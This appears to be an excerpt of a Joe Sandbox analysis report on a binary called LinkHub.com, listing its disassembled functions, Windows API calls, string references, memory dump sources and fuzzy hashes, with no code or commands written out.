Instruction Fuzzy Hash: CB012D7274AA107FD6122736AC49D6B19DDAFCD3B5720242AF915F22D1EE71CE854110

Function 00E308FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?,?,?,00E30C4E), ref: 00E3091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?,?), ref: 00E30936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?,?), ref: 00E30944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?), ref: 00E30954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E30831,80070057,?,?), ref: 00E30960

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: a49a351c23073a5add352469a2037ca3a5c074f8e38ff4f773954321ccf25d0f
Instruction ID: e326361f69d6fcc369b97412d66c5fe0ad55cbf32aaac476782ce403be365640
Opcode Fuzzy Hash: a49a351c23073a5add352469a2037ca3a5c074f8e38ff4f773954321ccf25d0f
Instruction Fuzzy Hash: BA015A72A04218AFEB154F56EC48B9A7EADEBC47A1F150124F905F2212D7B1DD44DAA0

Function 00E3F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00E3F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00E3F2BC
Sleep.KERNEL32(00000000), ref: 00E3F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00E3F2CE
Sleep.KERNEL32 ref: 00E3F30A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 79095ccfe9ee8db4c19bedea6c8a16e2bb76b2efa0e6381849a252de3e4b4f84
Instruction ID: 116ba1ee16a2874bbc0c76323f99a80bf6172628e564ba19e16716dbaa27f79b
Opcode Fuzzy Hash: 79095ccfe9ee8db4c19bedea6c8a16e2bb76b2efa0e6381849a252de3e4b4f84
Instruction Fuzzy Hash: 80016971D0562ADFCF00AFA6EC4DAEEBF78FB09710F411466E502B2260DBB09558C7A1

Function 00E31A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E31A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E31A99

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: b1f4cd263c8c3bb623fa389b24e2f60991fbfd6743587c18bde794dc888d237c
Instruction ID: 243442411c130ce730c7a68ea388a2247fc4ae767742244d6a0de793cebf341d
Opcode Fuzzy Hash: b1f4cd263c8c3bb623fa389b24e2f60991fbfd6743587c18bde794dc888d237c
Instruction Fuzzy Hash: 690181B5A01205BFDB114F66EC4CD6B3F6EEF893A5F610458F845E3260DAB1DC40CA60

Function 00E31960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E31976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E31982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E31991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E31998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E319AE

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b53d946f0fcf25b5fab0fc116bdf7caad52ac17bc4aa12efa656707c52b916e8
Instruction ID: 2111672c003f08b5826b2f8ae1bd62e7571e456cf5829457c1c08abf75e8d235
Opcode Fuzzy Hash: b53d946f0fcf25b5fab0fc116bdf7caad52ac17bc4aa12efa656707c52b916e8
Instruction Fuzzy Hash: 19F03775604301AFDB214FA6EC59B573FAEEF896A0F514454FA45E72A0CAB1E804CA60

Function 00E31900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E31916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E31922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E31931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E31938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E3194E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 027f981e3766a968bfb1680fd1811520831652f3866a043dfc5cfcf5b6fe496a
Instruction ID: 05c136d4d9606681d6adb8768116f78c6a01988e20cd6ce0b2935487333ab22e
Opcode Fuzzy Hash: 027f981e3766a968bfb1680fd1811520831652f3866a043dfc5cfcf5b6fe496a
Instruction Fuzzy Hash: 44F03775604306AFDB210FA6AC5DF573FAAEF897A0F510454FA45E72A0CAB1D804CA60

Function 00E40CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00E40B24,?,00E43D41,?,00000001,00E13AF4,?), ref: 00E40CCB
CloseHandle.KERNEL32(?,?,?,?,00E40B24,?,00E43D41,?,00000001,00E13AF4,?), ref: 00E40CD8
CloseHandle.KERNEL32(?,?,?,?,00E40B24,?,00E43D41,?,00000001,00E13AF4,?), ref: 00E40CE5
CloseHandle.KERNEL32(?,?,?,?,00E40B24,?,00E43D41,?,00000001,00E13AF4,?), ref: 00E40CF2
CloseHandle.KERNEL32(?,?,?,?,00E40B24,?,00E43D41,?,00000001,00E13AF4,?), ref: 00E40CFF
CloseHandle.KERNEL32(?,?,?,?,00E40B24,?,00E43D41,?,00000001,00E13AF4,?), ref: 00E40D0C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 19ff181d1adf231d1a61949d91a73b33e04c3fe8b723dd847e00591e40b282bf
Instruction ID: 96547dfebb64a73de8b69c3f2a7f06fe4db96cc52534700322f15706e9e7ce10
Opcode Fuzzy Hash: 19ff181d1adf231d1a61949d91a73b33e04c3fe8b723dd847e00591e40b282bf
Instruction Fuzzy Hash: BD01AE71800B15DFCB30AFA6E980816FBF9BF503193159A3ED29662931C7B0A948DF80

Function 00E365AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00E365BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00E365D6
MessageBeep.USER32(00000000), ref: 00E365EE
KillTimer.USER32(?,0000040A), ref: 00E3660A
EndDialog.USER32(?,00000001), ref: 00E36624

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: d325db63862c85fea29b38413f83e245e042158b59b7f3fc7f8784b0e1e7fb77
Instruction ID: b419716c8f3dfcd58ebf608fe08ac69851ea37812755f43e4a2c3e56ed93f6d9
Opcode Fuzzy Hash: d325db63862c85fea29b38413f83e245e042158b59b7f3fc7f8784b0e1e7fb77
Instruction Fuzzy Hash: 2A016230A04704BBEB215B21ED4EB9B7B78FF04749F404569E186710E1DBE0AA58CA50

Function 00E0DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E0DAD2

Part of subcall function 00E02D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0DB51,?,00000000,?,00000000,?,00E0DB78,?,00000007,?,?,00E0DF75,?), ref: 00E02D4E
Part of subcall function 00E02D38: GetLastError.KERNEL32(?,?,00E0DB51,?,00000000,?,00000000,?,00E0DB78,?,00000007,?,?,00E0DF75,?,?), ref: 00E02D60

_free.LIBCMT ref: 00E0DAE4
_free.LIBCMT ref: 00E0DAF6
_free.LIBCMT ref: 00E0DB08
_free.LIBCMT ref: 00E0DB1A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d90c5d11febbe977b8258f5740c30c907046c86995801dcf45e25f332dbdf98
Instruction ID: d2c55d8374d4221a77caebede417ad36f834edef90e6fb85fb04a7685ac1c3c8
Opcode Fuzzy Hash: 1d90c5d11febbe977b8258f5740c30c907046c86995801dcf45e25f332dbdf98
Instruction Fuzzy Hash: 49F0FF3254C214ABC624EB99ED85D1A77EDAF447147956C0AF149F7581CA30FCC08B94

Function 00E02610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E0262E

Part of subcall function 00E02D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0DB51,?,00000000,?,00000000,?,00E0DB78,?,00000007,?,?,00E0DF75,?), ref: 00E02D4E
Part of subcall function 00E02D38: GetLastError.KERNEL32(?,?,00E0DB51,?,00000000,?,00000000,?,00E0DB78,?,00000007,?,?,00E0DF75,?,?), ref: 00E02D60

_free.LIBCMT ref: 00E02640
_free.LIBCMT ref: 00E02653
_free.LIBCMT ref: 00E02664
_free.LIBCMT ref: 00E02675

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e1f6bd540c34e5284e4564b584e80f3d209e31975a5f4d8db3be6b74d72216ea
Instruction ID: aa680c08af19e199d099a5b518baea7b48aea854f28a74f3355002424fc451ce
Opcode Fuzzy Hash: e1f6bd540c34e5284e4564b584e80f3d209e31975a5f4d8db3be6b74d72216ea
Instruction Fuzzy Hash: 73F017749191208FCA12AF6AFC059483AE8BB2A750300994FF610B23F5C7312D99BEE4

Function 00E012B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00E01469
__freea.LIBCMT ref: 00E01487

Part of subcall function 00E018A7: _free.LIBCMT ref: 00E018BF

Strings

a/p, xrefs: 00E0154E
am/pm, xrefs: 00E014EA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 9e066484478b8dde893d3640c360e566ab7aa268c691d6c2ecc5609c7664727d
Instruction ID: e7b4b5b7ed39f7e0c3dde00c04639e33715c6f74235b6d58fd4eb59622673e4f
Opcode Fuzzy Hash: 9e066484478b8dde893d3640c360e566ab7aa268c691d6c2ecc5609c7664727d
Instruction Fuzzy Hash: 86D1E171900206DACB259FA8C8557FAB7B1FF15308F28619AE506BF2D0D7369DC0CBA1

Function 00E55231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 00E441FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E552EE,?,?,00000035,?), ref: 00E44229
Part of subcall function 00E441FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E552EE,?,?,00000035,?), ref: 00E44239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00E55419
VariantInit.OLEAUT32(?), ref: 00E5550E
VariantClear.OLEAUT32(?), ref: 00E555CD

Strings

bn, xrefs: 00E554ED, 00E555E4

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bn
API String ID: 2854431205-2317007323
Opcode ID: 1f8cbb4091043b9a1801c48ba04fe43b2659ff5183607718351a5cddc5b40fad
Instruction ID: d5960f663d0df4aa6b68472d5670e79a1356686f20e8be238ec9631696e024ca
Opcode Fuzzy Hash: 1f8cbb4091043b9a1801c48ba04fe43b2659ff5183607718351a5cddc5b40fad
Instruction Fuzzy Hash: 65D16E71900249DFCB14EF95C8A1AEEBBB4FF08314F54445EE416AB291DB71E98ACF60

Function 00DDCF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DDD253

Strings

t5, xrefs: 00DDCFCF
t5, xrefs: 00DDCFC8
t5, xrefs: 00DDD23A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5$t5$t5
API String ID: 1385522511-3228143211
Opcode ID: 0af5a16d07f56637b72ad40260dbc8e5cb12cdb48e2c2c17f4db69d88b9e48d4
Instruction ID: 106dae02c74fb74ab1daec91369194b8ce4a00a86fa9e125a60d22c24e999b1d
Opcode Fuzzy Hash: 0af5a16d07f56637b72ad40260dbc8e5cb12cdb48e2c2c17f4db69d88b9e48d4
Instruction Fuzzy Hash: F2913D75A00206DFCF14CF69C4916B9BBF2FF99314F24855AE985AB341D731E982CBA0

Function 00E561A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00E5623D
_wcslen.LIBCMT ref: 00E56249

Strings

bn, xrefs: 00E561B1, 00E562E1
CALLARGARRAY, xrefs: 00E56243, 00E56248

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bn
API String ID: 157775604-1875210186
Opcode ID: c6173352c0b42b0fc11d304ad5049b49d8c761a8cc44ccac86a75c7fd2c825f4
Instruction ID: 9cb4f683656f1ca28bf2450c29624423337db3973ec689e30a0afb8ac2f14299
Opcode Fuzzy Hash: c6173352c0b42b0fc11d304ad5049b49d8c761a8cc44ccac86a75c7fd2c825f4
Instruction Fuzzy Hash: 6041B175E002099FCB00DFA5C8859EEBBF5FF58365F505419E806B7261D7709D86CB60

Function 00E33063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E32B1D,?,?,00000034,00000800,?,00000034), ref: 00E3BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E330AD

Part of subcall function 00E3BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E32B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E3BDBF

Part of subcall function 00E3BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E3BD1C
Part of subcall function 00E3BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E32AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E3BD2C
Part of subcall function 00E3BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E32AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E3BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E3311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E33167

Strings

@, xrefs: 00E3317F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: bafb872b7156741aea98336a005760084f65197741c48f69a18203403e12e974
Instruction ID: ba3a8a84d983e4831bb0d03c8328257127dcc8af6032cbe761cd87eb1b572bf5
Opcode Fuzzy Hash: bafb872b7156741aea98336a005760084f65197741c48f69a18203403e12e974
Instruction Fuzzy Hash: A6412C76A01218BEDB11DFA4CD85EEEBBB8EF45704F005095FA45B7180DA706F85CB61

Function 00E01A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00E01AD9
_free.LIBCMT ref: 00E01BA4
_free.LIBCMT ref: 00E01BAE

Strings

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com, xrefs: 00E01AD0, 00E01AD7, 00E01B06, 00E01B3E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
API String ID: 2506810119-1604394757
Opcode ID: 58de7f4324f89f63d05a1c48b18eacb9dea6a607e82cbf6291cf1578df8a1f85
Instruction ID: 541d5eb19244f4630febe1bfb40e4c63bcb10c4fc08d1d5f2126b808885a27df
Opcode Fuzzy Hash: 58de7f4324f89f63d05a1c48b18eacb9dea6a607e82cbf6291cf1578df8a1f85
Instruction Fuzzy Hash: AC315271A00218EFCB21DF99DC85D9EBBFCEB85714B1051AAE504BB261E7705E84DBA0

Function 00E3CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E3CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00E3CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EA29C0,019953E0), ref: 00E3CC40

Strings

0, xrefs: 00E3CB8A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
